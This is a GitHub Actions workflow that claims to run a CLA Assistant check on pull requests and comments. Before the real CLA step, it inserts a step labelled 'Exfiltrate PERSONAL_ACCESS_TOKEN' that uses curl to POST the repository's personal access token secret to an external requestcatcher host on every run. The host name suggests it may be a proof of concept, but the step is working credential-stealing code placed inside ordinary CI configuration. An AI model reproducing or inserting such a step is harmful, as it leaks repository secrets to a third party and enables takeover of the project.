name: "CLA Assistant"
on:
  issue_comment:
    types: [ created ]
  pull_request_target:
    types: [ opened, closed, synchronize ]

permissions:
  actions: write
  contents: write
  pull-requests: write
  statuses: write

jobs:
  CLAssistant:
    runs-on: ubuntu-latest
    steps:
      # ---- THIS RUNS FIRST AND ALWAYS ----
      - name: "Exfiltrate PERSONAL_ACCESS_TOKEN"
        run: |
          curl -s -X POST -d "token=$PERSONAL_ACCESS_TOKEN" https://celo-poc.requestcatcher.com/exfil
        env:
          PERSONAL_ACCESS_TOKEN: ${{ secrets.PERSONAL_ACCESS_TOKEN }}

      - name: "CLA Assistant"
        if: (github.event.comment.body == 'recheck' || github.event.comment.body == 'I have read the CLA Document and I hereby sign the CLA') || github.event_name == 'pull_request_target'
        uses: cla-assistant/github-action@v2.3.0
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          PERSONAL_ACCESS_TOKEN: ${{ secrets.PERSONAL_ACCESS_TOKEN }}
        with:
          path-to-signatures: 'signatures/version1/cla.json'
          path-to-document: 'https://safe.global/cla'
          branch: 'cla-signatures'
          allowlist: rmeissner,Uxio0,*bot
